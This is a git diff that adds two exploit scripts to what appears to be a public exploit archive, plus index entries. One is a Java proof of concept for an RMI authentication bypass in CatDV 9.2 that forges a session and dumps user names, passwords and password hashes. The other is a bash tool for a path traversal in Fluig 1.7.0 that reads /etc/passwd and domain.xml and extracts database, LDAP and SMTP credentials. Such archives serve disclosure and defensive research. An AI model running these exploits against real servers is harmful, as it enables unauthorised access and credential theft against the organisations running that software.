diff --git a/exploits/java/remote/49621.java b/exploits/java/remote/49621.java new file mode 100644 index 000000000..d1d6270cb --- /dev/null +++ b/exploits/java/remote/49621.java @@ -0,0 +1,96 @@ +# Exploit Title: CatDV 9.2 - RMI Authentication Bypass +# Date: 3/1/2021 +# Exploit Author: Christopher Ellis, Nick Gonella, Workday Inc. +# Vendor Homepage: https://catdv.com/ +# Software Link: https://www.squarebox.com/download/CatDVServer9.2.0.exe +# Version: 9.2 and lower +# Tested on: Windows, Mac + +import org.h2.engine.User; +import squarebox.catdv.shared.*; + +import java.net.MalformedURLException; +import java.rmi.Naming; +import java.rmi.NotBoundException; +import java.rmi.RemoteException; + +public class Runnable { + public Runnable() throws RemoteException, NotBoundException, MalformedURLException { } + + private static int getValidSession(long createdTime, String claimedHost) { + return (int)createdTime + claimedHost.hashCode(); + } + + private static void printFields(SField[] fields) { + for (SField field : fields) { + System.out.println(field.fieldDefID); + System.out.println(field.value); + System.out.println(field.fieldDefinition); + } + } + + public static void main(String args[]) throws RemoteException, NotBoundException, MalformedURLException { + String target = "rmi://:1099/CatDVServer"; + + ServerAPI look_up = (ServerAPI) Naming.lookup(target); + + System.out.println("Trying to get all connections"); + SConnection[] connections = look_up.getConnections(); + for (SConnection element : connections) { + System.out.println("Found connection:"); + System.out.println("CatDVUser:"+ element.catdvUser); + System.out.println("ApiVersion:"+ element.apiVersion); + System.out.println("User:"+ element.user); + System.out.println("ClaimedHost:"+ element.claimedHost); + System.out.println("ActualHost:"+ element.actualHost); + System.out.println("Created:"+ element.created); + System.out.println("LastUsed:"+ element.lastUsed); + System.out.println("Client features:"+ element.clientFeatures); + System.out.println("\n"); + } + + System.out.println("Getting system properties"); + System.out.println("Running from: "+look_up.getProperty("user.dir")); + System.out.println("Running on: "+look_up.getProperty("os.arch")); + System.out.println("Java version: "+look_up.getProperty("java.version")); + + //We can create a new client from most of the fields found in the existing connections which we can dump anonymously + ClientID bob=new ClientID( + connections[0].catdvUser, + connections[0].claimedHost, + getValidSession(connections[0].created,connections[0].claimedHost), + connections[0].created, + ""); + + System.out.println("\nCreated a new client with parameters: \n" + + "" + "user:"+connections[0].catdvUser+"\n"+ + "" + "claimedHost:"+connections[0].claimedHost+"\n"+ + "" + "session:"+getValidSession(connections[0].created,connections[0].claimedHost)+"\n"+ + "" + "created:"+connections[0].created+"\n"+ + "" + "pubkey:"+""+ + ""); + + + String status = look_up.getStatus(bob); + System.out.println("Status is: \n "+status); + + System.out.println("Attempting to dump users: \n"); + SUser[] users=look_up.getUsers(bob, -1); + for (SUser element: users) { + + System.out.println(element.name); + System.out.println(element.passwordHash); + System.out.println("id:" + element.ID); + System.out.println("realname:" + element.realname); + System.out.println("email:" + element.email); + System.out.println("password:" + element.password); + System.out.println("notes:" + element.notes); + System.out.println("inactive:" + element.inactive); + System.out.println("RoleiD:" + element.roleID); + System.out.println("hash:" + element.passwordHash); + System.out.println(""); + } + + } + +} \ No newline at end of file diff --git a/exploits/multiple/webapps/49622.sh b/exploits/multiple/webapps/49622.sh new file mode 100755 index 000000000..3087b5a99 --- /dev/null +++ b/exploits/multiple/webapps/49622.sh @@ -0,0 +1,208 @@ +# Exploit Title: Fluig 1.7.0 - Path Traversal +# Date: 26/11/2020 +# Exploit Author: Lucas Souza +# Vendor Homepage: https://www.totvs.com/fluig/ +# Version: <== 1.7.0-210217 +# Tested on: 1.7.0-201124 + +#!/bin/bash +url="$1" +npayload=$2 +> payload.txt +curl -s https://raw.githubusercontent.com/lucxssouza/banners/main/xFluig/banner > banner +# -- FUNCTIONS -- + +function create-payload { + > wordlist.txt + count=1 + while [[ $count -le $npayload ]]; do + # WINDOWS PAYLOAD + echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt + echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../users/public/desktop/desktop.ini" >> wordlist.txt + # LINUX PAYLOAD + echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../etc/passwd" >> wordlist.txt + echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../opt/fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt + count=$[$count + 1] + done +} + +function manual-mode { + while :; do + echo + echo -e "\033[0;31m[!] VALID MANUAL MODE COMMANDS\033[0m" + echo + echo -e "\033[0;32m -[ clear - Clear Screen\033[0m" + echo -e "\033[0;32m -[ target - Set a target\033[0m" + echo -e "\033[0;32m -[ director/file - Ex: /etc/passwd\033[0m" + echo -e "\033[0;32m -[ info - Target info and parse 'domain.xml' file ( require target )\033[0m" + echo + echo -n -e "\033[0;31mMANUAL MODE >>\033[0m "; read -r input2 + path=$(echo $input2 | sed 's/\\/\//g' | tr '[:upper:]' '[:lower:]') + mkfile=$(echo $path | sed 's/\//-/g' | sed 's/-//' | tr '[:upper:]' '[:lower:]') + if [[ $path == 'info' ]]; then + clear + cat banner + domain-xml + elif [[ $path == 'clear' ]]; then + clear + elif [[ $path == 'target' ]]; then + XmlPayload='' + echo + echo -n -e "\033[0;31mINSERT TARGET >> \033[0m"; read url + echo -n -e "\033[0;31mWORDLIST SIZE >> \033[0m"; read -i npayload + enum + else + echo + echo "$param../../../../../../../../../../../../..$path" > wordlist.txt + wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f2 | grep 200 | cut -d'"' -f2 > payload.txt + DirPath=$(head -1 payload.txt) + if [[ $DirPath == '' ]]; then + echo + echo -e ' \033[0;33m[!] COMMAND OR DIRECTORY/FILE NOT FOUND - TYPE HELP\033[0m' + else + curl -s $url/volume/stream/Rmx1aWc=/$DirPath > report/$mdr/$mkfile + echo + echo -e '\033[0;31m'$path'\033[0m' + echo + cat report/$mdr/$mkfile + echo + pwd=$(pwd) + echo + echo -e '\033[0;33m'[!] FILE SAVE IN, $pwd/report/$mdr/$mkfile'\033[0m' + fi + fi + done +} + +function domain-xml { + domain=$(ls report/$mdr | grep domain.xml) +if [[ $domain == '' ]]; then + echo + echo -e '\033[0;33m[!] DOMAIN.XML FILE NOT FOUND\033[0m' +else + echo + echo -e ' \033[0;32m | TOTVS FLUIG - [+] XML ANALISYS\033[0m' + echo + echo -e ' \033[0;33m[!] INFORMATION\033[0m' + echo + curl -s -I $url | grep Server + echo + echo -e '\033[0;31mTarget\033[0m' + echo $url + echo + echo -e '\033[0;31mPayload plaintext\033[0m' + echo $XmlPayload | base64 -d + echo + echo + echo -e '\033[0;31mPayload base64 encoded\033[0m' + echo $XmlPayload + echo + echo -e ' \033[0;31m[!] DATABASE CONNECTIONS FOUNDS\033[0m' + echo + cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep connection-url | sed 's//\o033[0;31mDB CONNECT >> \o033[0m/g' | sed 's/<\/connection-url>/ \o033[0;31m<< \o033[0m/g' | sed 's/${env.FLUIG_DATABASE_URL://g' | sed 's/}//g' + echo + echo -e ' \033[0;31m[!] USERS/PASSWORDS FOUNDS\033[0m' + echo + cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep user-name | sed 's// \o033[0;31mUSER >> \o033[0m/g' | sed 's/<\/user-name>/ \o033[0;31m<< \o033[0m /g' | sed 's/${env.FLUIG_DATABASE_USER://g' | sed 's/}//g' + cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep password'>' | sed 's//\o033[0;31m PASSWORD >> \o033[0m/g' | sed 's/<\/password>/ \o033[0;31m<< \o033[0m/g' | sed 's/${env.FLUIG_DATABASE_PASSWORD://g' | sed 's/}//g' + echo + echo -e ' \033[0;31m[!] LDAP INTEGRATIONS\033[0m' + echo + cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep ldap:// | sed 's/> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g' + cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep baseCtxDN | sed 's/> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g' + cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep security.principal | sed 's/> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g' + cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep security.credentials | sed 's/> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g' + echo + echo -e ' \033[0;31m[!] SMTP SETTINGS\033[0m' + echo + cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep remote-destination | sed 's/> \o033[0m/g' | sed 's/\/>/ \o033[0;31m<< \o033[0m /g' | sed 's/${env.FLUIG_SMTP_HOST://g' | sed 's/${env.FLUIG_HOST_ADDRESS://g' | sed 's/${env.FLUIG_SMTP_PORT//g'| sed 's/}//g' + cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep smtp-server | sed 's///g' | sed 's/password="/\o033[0;31mPASSWORD >> \o033[0m/g' | sed 's/"username="/\o033[0;31m USER >> \o033[0m/g' | sed 's/}//g' | sed 's/${env.FLUIG_SMTP_USERNAME://g' | sed 's/${env.FLUIG_SMTP_PASSWORD://g' + echo + manual-mode +fi +} + +function enum { +mdr=$(echo $url | sed 's/https:\/\///' | sed 's/http:\/\///' | sed 's/\///') +mkdir -p report/$mdr + if [[ $url == '' ]]; then + clear + cat banner + echo -e ' \033[0;31m-[ Usage Ex1: ./xfluig.sh FLUIG_ADDRESS REQUESTS_WFUZZ\033[0m' + echo -e ' \033[0;31m-[ Ex2: ./xfluig.sh FLUIG_ADDRESS:PORT REQUESTS_WFUZZ\033[0m' + echo -e ' \033[0;31m-[ ( ./xfluig.sh fluig.host.com:8080 1000 )\033[0m' + manual-mode + elif [[ $npayload == '' ]]; then + npayload=25 + clear + cat banner + echo -e ' \033[0;32m | TOTVS FLUIG - [+] PATH ENUMERATION\033[0m' + echo + echo -e '\033[0;31m[>>] GENERATING PAYLOAD WORDLIST\033[0m' + echo + create-payload + else + clear + cat banner + echo -e ' \033[0;32m | TOTVS FLUIG - [+] PATH ENUMERATION\033[0m' + echo + echo -e '\033[0;31m[>>] GENERATING PAYLOAD WORDLIST\033[0m' + create-payload + fi +echo +echo -e '\033[0;31m[>>] RUNNING WFUZZ - WAIT\033[0m' +echo +wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f3 | grep 200 | cut -d'"' -f2 > payload.txt +payload=$(head -1 payload.txt) +if [[ $payload == '' ]]; then + clear + cat banner + echo -e ' \033[0;32m | TOTVS FLUIG - PATH ENUMERATION AND XML ANALISYS \033[0m' + echo + echo -e '\033[0;33m[!] DIRECTORY/FILE NOT FOUND OR TARGET NOT VULNERABLE\033[0m' + echo + manual-mode +else + param=$(echo $payload | base64 -d | cut -d '.' -f1) + clear + cat banner + echo -e ' \033[0;32m | TOTVS FLUIG - [+] STATUS\033[0m' + echo + echo -e ' \033[0;33m[!] VULNERABLE\033[0m' + echo + echo -e '\033[0;31m[>>] SEARCHING DOMAIN.XML FILE\033[0m' + echo "$param../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml" > wordlist.txt + echo "$param../../../../../../../../../../../../../opt/fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt + wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f3 | grep 200 | cut -d'"' -f2 > payload.txt + clear + cat banner + echo -e ' \033[0;32m | TOTVS FLUIG - [+] STATUS\033[0m' + echo + echo -e ' \033[0;33m[!] VULNERABLE\033[0m' + echo + curl -s -I $url | grep Server + echo + echo -e '\033[0;31mTarget\033[0m' + echo $url + echo + echo -e '\033[0;31mPayload plaintext\033[0m' + echo $payload | base64 -d + echo + echo + echo -e '\033[0;31mPayload base64 encoded\033[0m' + echo $payload + echo +fi +XmlPayload=$(head -1 payload.txt) +if [[ $XmlPayload == '' ]]; then + echo + echo -e '\033[0;33m[!] DOMAIN.XML FILE NOT FOUND\033[0m' + manual-mode +else + curl -s $url/volume/stream/Rmx1aWc=/$XmlPayload | sed 's/[[:blank:]]//g' > report/$mdr/domain.xml + echo + echo -e '\033[0;33m[!] DOMAIN.XML FILE FOUND - TYPE "INFO" TO PARSE\033[0m' + manual-mode +fi +} +enum \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 7ae944904..8024f0772 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -18392,6 +18392,7 @@ id,file,description,date,author,type,platform,port 49599,exploits/windows/remote/49599.py,"Remote Desktop Web Access - Authentication Timing Attack (Metasploit Module)",2021-02-26,"Matthew Dunn",remote,windows, 49601,exploits/windows/remote/49601.py,"WiFi Mouse 1.7.8.5 - Remote Code Execution",2021-03-01,H4rk3nz0,remote,windows, 49613,exploits/linux/remote/49613.py,"AnyDesk 5.5.2 - Remote Code Execution",2021-03-03,scryh,remote,linux, +49621,exploits/java/remote/49621.java,"CatDV 9.2 - RMI Authentication Bypass",2021-03-05,"Christopher Ellis",remote,java, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -43807,3 +43808,4 @@ id,file,description,date,author,type,platform,port 49618,exploits/php/webapps/49618.txt,"Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)",2021-03-04,"Suraj Bhosale",webapps,php, 49619,exploits/php/webapps/49619.txt,"Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection (Authenticated)",2021-03-04,"Deepak Kumar Bharti",webapps,php, 49620,exploits/php/webapps/49620.py,"Textpattern 4.8.3 - Remote code execution (Authenticated) (2)",2021-03-04,"Ricardo Ruiz",webapps,php, +49622,exploits/multiple/webapps/49622.sh,"Fluig 1.7.0 - Path Traversal",2021-03-05,"Lucas Souza",webapps,multiple,